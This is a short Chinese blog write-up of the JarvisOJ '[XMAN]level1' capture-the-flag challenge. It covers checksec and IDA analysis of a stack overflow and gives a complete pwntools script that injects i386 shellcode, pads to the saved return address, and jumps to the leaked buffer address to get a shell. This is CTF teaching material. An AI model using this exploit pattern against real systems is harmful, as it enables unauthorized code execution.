jarvisoj——[XMAN]level1

题目

在这里插入图片描述

Wp

先查一下基本的内容
在这里插入图片描述

可以看到 RELRO: Partial RELRO就是got表可写的意思,然后ida接着看看源码,这里就是说调用了一个无参的函数

在这里插入图片描述
这里看到很明显的是一个溢出,但是这里没有shellcode,就需要自己写一个了

在这里插入图片描述
这里可以看到print打印了buf的地址

在这里插入图片描述
这里写一个pwntools的脚本


from pwn import *
sh = remote("pwn2.jarvisoj.com",9877)
shellcode = asm(shellcraft.i386.linux.sh())
line = sh.recvline()[14:-2]
buf_addr = int(line,16)
payload = shellcode + 'A' * (0x88 + 0x4 - len(shellcode)) + p32(buf_addr)
sh.send(payload)
sh.interactive()
sh.close()

最后拿到flag

在这里插入图片描述

已标记关键词 清除标记
相关推荐
©️2020 CSDN 皮肤主题: 程序猿惹谁了 设计师:白松林 返回首页